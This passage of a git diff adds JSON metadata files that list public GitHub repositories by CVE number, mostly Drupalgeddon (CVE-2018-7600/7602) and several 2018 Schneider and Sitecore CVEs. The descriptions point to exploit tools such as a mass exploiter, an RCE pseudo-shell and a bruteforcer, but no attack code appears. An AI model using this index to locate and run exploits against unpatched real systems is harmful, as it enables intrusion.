"https:\/\/github.com\/drugeddon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/drugeddon\/drupal-exploit", + "description": "CVE-2018-7600", + "fork": false, + "created_at": "2019-03-24T10:44:06Z", + "updated_at": "2020-10-09T12:51:14Z", + "pushed_at": "2019-03-24T12:14:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 214170556, + "name": "Drupalgeddon-Mass-Exploiter", + "full_name": "shellord\/Drupalgeddon-Mass-Exploiter", + "owner": { + "login": "shellord", + "id": 2632896, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2632896?v=4", + "html_url": "https:\/\/github.com\/shellord", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shellord\/Drupalgeddon-Mass-Exploiter", + "description": "CVE-2018-7600 and CVE-2018-7602 Mass Exploiter", + "fork": false, + "created_at": "2019-10-10T11:56:29Z", + "updated_at": "2022-11-23T07:43:27Z", + "pushed_at": "2019-10-10T14:10:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 253711698, + "name": "CVE-2018-7600-Drupal-POC-EXP", + "full_name": "zhzyker\/CVE-2018-7600-Drupal-POC-EXP", + "owner": { + "login": "zhzyker", + "id": 32918050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32918050?v=4", + "html_url": "https:\/\/github.com\/zhzyker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhzyker\/CVE-2018-7600-Drupal-POC-EXP", + "description": "CVE-2018-7600 Drupal Drupalgeddon 2 远程代码执行漏洞利用脚本", + "fork": false, + "created_at": "2020-04-07T06:54:13Z", + "updated_at": "2024-08-12T19:59:51Z", + "pushed_at": "2020-04-07T06:58:29Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 255032331, + "name": "CVE-2018-7600-Drupal7", + "full_name": "rabbitmask\/CVE-2018-7600-Drupal7", + "owner": { + "login": "rabbitmask", + "id": 37649548, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37649548?v=4", + "html_url": "https:\/\/github.com\/rabbitmask", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rabbitmask\/CVE-2018-7600-Drupal7", + "description": "CVE-2018-7600【Drupal7】批量扫描工具。", + "fork": false, + "created_at": "2020-04-12T07:37:14Z", + "updated_at": "2023-01-31T18:04:27Z", + "pushed_at": "2020-04-15T02:43:12Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 273180012, + "name": "drupalhunter", + "full_name": "ynsmroztas\/drupalhunter", + "owner": { + "login": "ynsmroztas", + "id": 58443521, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58443521?v=4", + "html_url": "https:\/\/github.com\/ynsmroztas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ynsmroztas\/drupalhunter", + "description": "CVE-2018-7600 0-Day Exploit (cyber-warrior.org)", + "fork": false, + "created_at": "2020-06-18T08:12:44Z", + "updated_at": "2020-07-19T01:10:15Z", + "pushed_at": "2020-06-18T08:24:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 286360004, + "name": "Drupalgeddon2", + "full_name": "ruthvikvegunta\/Drupalgeddon2", + "owner": { + "login": "ruthvikvegunta", + "id": 49064045, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49064045?v=4", + "html_url": "https:\/\/github.com\/ruthvikvegunta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ruthvikvegunta\/Drupalgeddon2", + "description": "CVE-2018-7600 | Drupal < 7.58 \/ < 8.3.9 \/ < 8.4.6 \/ < 8.5.1 - 'Drupalgeddon2' RCE", + "fork": false, + "created_at": "2020-08-10T02:46:18Z", + "updated_at": "2023-10-28T14:36:08Z", + "pushed_at": "2020-08-13T07:23:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "drupal", + "drupalgeddon2", + "exploit", + "hacking", + "python", + "rce" + ], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 291841926, + "name": "drupal8-REST-RCE", + "full_name": "ludy-dev\/drupal8-REST-RCE", + "owner": { + "login": "ludy-dev", + "id": 70466565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70466565?v=4", + "html_url": "https:\/\/github.com\/ludy-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ludy-dev\/drupal8-REST-RCE", + "description": "(CVE-2019-6340, CVE-2018-7600) drupal8-REST-RCE ", + "fork": false, + "created_at": "2020-08-31T22:55:18Z", + "updated_at": "2020-11-24T15:41:16Z", + "pushed_at": "2020-11-07T10:06:50Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 374077433, + "name": "CVE-2018-7600", + "full_name": "0xAJ2K\/CVE-2018-7600", + "owner": { + "login": "0xAJ2K", + "id": 48768952, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48768952?v=4", + "html_url": "https:\/\/github.com\/0xAJ2K", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xAJ2K\/CVE-2018-7600", + "description": "Drupal 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.", + "fork": false, + "created_at": "2021-06-05T09:49:56Z", + "updated_at": "2024-08-12T20:13:38Z", + "pushed_at": "2021-06-05T09:53:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 421659872, + "name": "drupalgeddon2-CVE-2018-7600", + "full_name": "rafaelcaria\/drupalgeddon2-CVE-2018-7600", + "owner": { + "login": "rafaelcaria", + "id": 53016430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53016430?v=4", + "html_url": "https:\/\/github.com\/rafaelcaria", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rafaelcaria\/drupalgeddon2-CVE-2018-7600", + "description": null, + "fork": false, + "created_at": "2021-10-27T03:09:48Z", + "updated_at": "2021-10-27T05:31:28Z", + "pushed_at": "2021-10-27T05:31:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 432042415, + "name": "ANM_CVE-2018-7600", + "full_name": "vphnguyen\/ANM_CVE-2018-7600", + "owner": { + "login": "vphnguyen", + "id": 48557263, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48557263?v=4", + "html_url": "https:\/\/github.com\/vphnguyen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vphnguyen\/ANM_CVE-2018-7600", + "description": "Detect with python and tracking IP", + "fork": false, + "created_at": "2021-11-26T03:25:50Z", + "updated_at": "2021-11-26T03:27:00Z", + "pushed_at": "2021-11-26T03:26:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 477484512, + "name": "CVE-2018-7600", + "full_name": "0xConstant\/CVE-2018-7600", + "owner": { + "login": "0xConstant", + "id": 51972282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51972282?v=4", + "html_url": "https:\/\/github.com\/0xConstant", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xConstant\/CVE-2018-7600", + "description": null, + "fork": false, + "created_at": "2022-04-03T22:45:53Z", + "updated_at": "2023-03-13T21:35:37Z", + "pushed_at": "2022-04-14T02:56:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 485290659, + "name": "CVE-2018-7600", + "full_name": "anldori\/CVE-2018-7600", + "owner": { + "login": "anldori", + "id": 101538840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101538840?v=4", + "html_url": "https:\/\/github.com\/anldori", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/anldori\/CVE-2018-7600", + "description": null, + "fork": false, + "created_at": "2022-04-25T08:46:00Z", + "updated_at": "2022-07-29T07:32:52Z", + "pushed_at": "2022-07-29T07:32:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 579338789, + "name": "CVE-2018-7600", + "full_name": "r0lh\/CVE-2018-7600", + "owner": { + "login": "r0lh", + "id": 51697374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51697374?v=4", + "html_url": "https:\/\/github.com\/r0lh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0lh\/CVE-2018-7600", + "description": "Drupal CVE-2018-7600 RCE Pseudo-Shell PoC", + "fork": false, + "created_at": "2022-12-17T11:11:47Z", + "updated_at": "2022-12-17T11:13:30Z", + "pushed_at": "2023-01-17T12:53:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 751191042, + "name": "CVE-2018-7600", + "full_name": "killeveee\/CVE-2018-7600", + "owner": { + "login": "killeveee", + "id": 101921087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101921087?v=4", + "html_url": "https:\/\/github.com\/killeveee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/killeveee\/CVE-2018-7600", + "description": "CVE-2018-7600 漏洞验证和利用", + "fork": false, + "created_at": "2024-02-01T05:30:19Z", + "updated_at": "2024-02-06T17:26:04Z", + "pushed_at": "2024-02-01T05:52:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814000479, + "name": "CVE-2018-7600", + "full_name": "raytran54\/CVE-2018-7600", + "owner": { + "login": "raytran54", + "id": 89938940, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89938940?v=4", + "html_url": "https:\/\/github.com\/raytran54", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raytran54\/CVE-2018-7600", + "description": null, + "fork": false, + "created_at": "2024-06-12T06:40:17Z", + "updated_at": "2024-07-17T13:40:13Z", + "pushed_at": "2024-07-17T13:40:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7602.json b/2018/CVE-2018-7602.json new file mode 100644 index 0000000000..ae426a4edb --- /dev/null +++ b/2018/CVE-2018-7602.json @@ -0,0 +1,157 @@ +[ + { + "id": 131232015, + "name": "Drupalgedon3", + "full_name": "1337g\/Drupalgedon3", + "owner": { + "login": "1337g", + "id": 32504404, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32504404?v=4", + "html_url": "https:\/\/github.com\/1337g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1337g\/Drupalgedon3", + "description": "POC to test\/exploit drupal vulnerability SA-CORE-2018-004 \/ CVE-2018-7602", + "fork": false, + "created_at": "2018-04-27T01:59:31Z", + "updated_at": "2024-08-12T19:38:05Z", + "pushed_at": "2018-04-26T14:49:51Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 140663638, + "name": "CVE-2018-7602", + "full_name": "happynote3966\/CVE-2018-7602", + "owner": { + "login": "happynote3966", + "id": 19719330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19719330?v=4", + "html_url": "https:\/\/github.com\/happynote3966", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/happynote3966\/CVE-2018-7602", + "description": null, + "fork": false, + "created_at": "2018-07-12T05:08:14Z", + "updated_at": "2018-07-17T02:57:18Z", + "pushed_at": "2018-07-17T02:57:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 155205612, + "name": "CVE-2018-7602", + "full_name": "kastellanos\/CVE-2018-7602", + "owner": { + "login": "kastellanos", + "id": 4370845, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4370845?v=4", + "html_url": "https:\/\/github.com\/kastellanos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kastellanos\/CVE-2018-7602", + "description": null, + "fork": false, + "created_at": "2018-10-29T12:08:53Z", + "updated_at": "2021-12-13T09:36:17Z", + "pushed_at": "2019-01-14T19:29:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 274906170, + "name": "DrupalCVE-2018-7602", + "full_name": "cyberharsh\/DrupalCVE-2018-7602", + "owner": { + "login": "cyberharsh", + "id": 57433814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57433814?v=4", + "html_url": "https:\/\/github.com\/cyberharsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberharsh\/DrupalCVE-2018-7602", + "description": null, + "fork": false, + "created_at": "2020-06-25T12:06:07Z", + "updated_at": "2023-04-26T12:05:45Z", + "pushed_at": "2020-07-02T15:52:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 759317557, + "name": "CVE-2018-7602", + "full_name": "132231g\/CVE-2018-7602", + "owner": { + "login": "132231g", + "id": 49609245, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49609245?v=4", + "html_url": "https:\/\/github.com\/132231g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/132231g\/CVE-2018-7602", + "description": null, + "fork": false, + "created_at": "2024-02-18T08:51:09Z", + "updated_at": "2024-02-18T08:51:10Z", + "pushed_at": "2024-02-18T08:52:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7669.json b/2018/CVE-2018-7669.json new file mode 100644 index 0000000000..c927e53b2d --- /dev/null +++ b/2018/CVE-2018-7669.json @@ -0,0 +1,33 @@ +[ + { + "id": 332705983, + "name": "CVE-2018-7669", + "full_name": "palaziv\/CVE-2018-7669", + "owner": { + "login": "palaziv", + "id": 8681088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8681088?v=4", + "html_url": "https:\/\/github.com\/palaziv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/palaziv\/CVE-2018-7669", + "description": "Quick and dirty bruteforcer for CVE-2018-7669 (Directory Traversal Vulnerability in Sitecore)", + "fork": false, + "created_at": "2021-01-25T10:13:32Z", + "updated_at": "2021-01-26T10:21:46Z", + "pushed_at": "2021-01-26T10:21:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7690.json b/2018/CVE-2018-7690.json new file mode 100644 index 0000000000..db7b2c405e --- /dev/null +++ b/2018/CVE-2018-7690.json @@ -0,0 +1,33 @@ +[ + { + "id": 159177319, + "name": "CVE-2018-7690", + "full_name": "alt3kx\/CVE-2018-7690", + "owner": { + "login": "alt3kx", + "id": 3140111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alt3kx\/CVE-2018-7690", + "description": "The SSC REST API contains Insecure Direct Object Reference (IDOR) vulnerabilities in Fortify Software Security Center (SSC) 17.10, 17.20 & 18.10 ", + "fork": false, + "created_at": "2018-11-26T13:52:45Z", + "updated_at": "2024-08-12T19:43:35Z", + "pushed_at": "2022-04-07T19:10:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7691.json b/2018/CVE-2018-7691.json new file mode 100644 index 0000000000..c8fa9650c6 --- /dev/null +++ b/2018/CVE-2018-7691.json @@ -0,0 +1,33 @@ +[ + { + "id": 159177517, + "name": "CVE-2018-7691", + "full_name": "alt3kx\/CVE-2018-7691", + "owner": { + "login": "alt3kx", + "id": 3140111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alt3kx\/CVE-2018-7691", + "description": "The SSC REST API contains Insecure Direct Object Reference (IDOR) vulnerabilities in Fortify Software Security Center (SSC) 17.10, 17.20 & 18.10 ", + "fork": false, + "created_at": "2018-11-26T13:54:08Z", + "updated_at": "2024-08-12T19:43:35Z", + "pushed_at": "2022-04-07T19:11:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7747.json b/2018/CVE-2018-7747.json new file mode 100644 index 0000000000..7dc2f9d96e --- /dev/null +++ b/2018/CVE-2018-7747.json @@ -0,0 +1,33 @@ +[ + { + "id": 130383133, + "name": "CVE-2018-7747", + "full_name": "mindpr00f\/CVE-2018-7747", + "owner": { + "login": "mindpr00f", + "id": 38467006, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38467006?v=4", + "html_url": "https:\/\/github.com\/mindpr00f", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mindpr00f\/CVE-2018-7747", + "description": "CalderaForms 1.5.9.1 XSS (WordPress plugin) - tutorial", + "fork": false, + "created_at": "2018-04-20T15:49:23Z", + "updated_at": "2018-04-21T13:40:18Z", + "pushed_at": "2018-04-21T13:40:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7750.json b/2018/CVE-2018-7750.json new file mode 100644 index 0000000000..f4f468f7ab --- /dev/null +++ b/2018/CVE-2018-7750.json @@ -0,0 +1,37 @@ +[ + { + "id": 156363089, + "name": "CVE-2018-7750", + "full_name": "jm33-m0\/CVE-2018-7750", + "owner": { + "login": "jm33-m0", + "id": 10167884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10167884?v=4", + "html_url": "https:\/\/github.com\/jm33-m0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jm33-m0\/CVE-2018-7750", + "description": "an RCE (remote command execution) approach of CVE-2018-7750", + "fork": false, + "created_at": "2018-11-06T10:01:13Z", + "updated_at": "2024-08-12T19:43:03Z", + "pushed_at": "2018-11-06T10:10:31Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2018-7750", + "exploit", + "poc" + ], + "visibility": "public", + "forks": 8, + "watchers": 21, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7842.json b/2018/CVE-2018-7842.json new file mode 100644 index 0000000000..3bedb6c3bf --- /dev/null +++ b/2018/CVE-2018-7842.json @@ -0,0 +1,33 @@ +[ + { + "id": 706159595, + "name": "CVE-2018-7842", + "full_name": "yanissec\/CVE-2018-7842", + "owner": { + "login": "yanissec", + "id": 145691912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145691912?v=4", + "html_url": "https:\/\/github.com\/yanissec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yanissec\/CVE-2018-7842", + "description": "CVE-2018-7842", + "fork": false, + "created_at": "2023-10-17T12:19:27Z", + "updated_at": "2023-10-17T12:19:34Z", + "pushed_at": "2023-10-24T02:18:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7843.json b/2018/CVE-2018-7843.json new file mode 100644 index 0000000000..14ee9d5589 --- /dev/null +++ b/2018/CVE-2018-7843.json @@ -0,0 +1,33 @@ +[ + { + "id": 706620543, + "name": "CVE-2018-7843", + "full_name": "yanissec\/CVE-2018-7843", + "owner": { + "login": "yanissec", + "id": 145691912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145691912?v=4", + "html_url": "https:\/\/github.com\/yanissec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yanissec\/CVE-2018-7843", + "description": "CVE-2018-7843", + "fork": false, + "created_at": "2023-10-18T09:58:32Z", + "updated_at": "2023-10-18T09:58:38Z", + "pushed_at": "2023-10-20T08:42:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7844.json b/2018/CVE-2018-7844.json new file mode 100644 index 0000000000..e1adf104b0 --- /dev/null +++ b/2018/CVE-2018-7844.json @@ -0,0 +1,33 @@ +[ + { + "id": 707621002, + "name": "CVE-2018-7844", + "full_name": "yanissec\/CVE-2018-7844", + "owner": { + "login": "yanissec", + "id": 145691912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145691912?v=4", + "html_url": "https:\/\/github.com\/yanissec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yanissec\/CVE-2018-7844", + "description": "CVE-2018-7844", + "fork": false, + "created_at": "2023-10-20T09:43:56Z", + "updated_at": "2023-10-20T09:44:02Z", + "pushed_at": "2023-10-23T09:05:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7845.json b/2018/CVE-2018-7845.json new file mode 100644 index 0000000000..8008b10795 --- /dev/null +++ b/2018/CVE-2018-7845.json @@ -0,0 +1,33 @@ +[ + { + "id": 708693818, + "name": "CVE-2018-7845", + "full_name": "yanissec\/CVE-2018-7845", + "owner": { + "login": "yanissec", + "id": 145691912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145691912?v=4", + "html_url": "https:\/\/github.com\/yanissec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yanissec\/CVE-2018-7845", + "description": "CVE-2018-7845", + "fork": false, + "created_at": "2023-10-23T07:42:06Z", + "updated_at": "2023-12-19T11:41:35Z", + "pushed_at": "2023-10-23T09:11:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7846.json b/2018/CVE-2018-7846.json new file mode 100644 index 0000000000..fda4831473 --- /dev/null +++ b/2018/CVE-2018-7846.json @@ -0,0 +1,33 @@ +[ + { + "id": 709098326, + "name": "CVE-2018-7846", + "full_name": "yanissec\/CVE-2018-7846", + "owner": { + "login": "yanissec", + "id": 145691912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145691912?v=4", + "html_url": "https:\/\/github.com\/yanissec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yanissec\/CVE-2018-7846", + "description": "CVE-2018-7846", + "fork": false, + "created_at": "2023-10-24T02:20:41Z", + "updated_at": "2023-10-24T02:20:48Z", + "pushed_at": "2023-10-25T01:21:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7848.json b/2018/CVE-2018-7848.json new file mode 100644 index 0000000000..731261e0d1 --- /dev/null +++ b/2018/CVE-2018-7848.json @@ -0,0 +1,33 @@ +[ + { + "id": 709595002, + "name": "CVE-2018-7848", + "full_name": "yanissec\/CVE-2018-7848", + "owner": { + "login": "yanissec", + "id": 145691912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145691912?v=4", + "html_url": "https:\/\/github.com\/yanissec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yanissec\/CVE-2018-7848", + "description": "CVE-2018-7848", + "fork": false, + "created_at": "2023-10-25T02:13:21Z", + "updated_at": "2023-10-25T02:13:27Z", + "pushed_at": "2023-10-25T02:13:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7849.json b/2018/CVE-2018-7849.json new file mode 100644 index 0000000000..7ae1f611bc --- /dev/null +++ b/2018/CVE-2018-7849.json @@ -0,0 +1,33 @@ +[ + { + "id": 710101029, + "name": "CVE-2018-7849", + "full_name": "yanissec\/CVE-2018-7849", + "owner": { + "login": "yanissec", + "id": 145691912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145691912?v=4", + "html_url": "https:\/\/github.com\/yanissec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yanissec\/CVE-2018-7849", + "description": "CVE-2018-7849", + "fork": false, + "created_at": "2023-10-26T02:50:25Z", + "updated_at": "2023-12-19T11:39:48Z", + "pushed_at": "2023-10-26T02:50:29Z", + "stargazers_count": 1, + 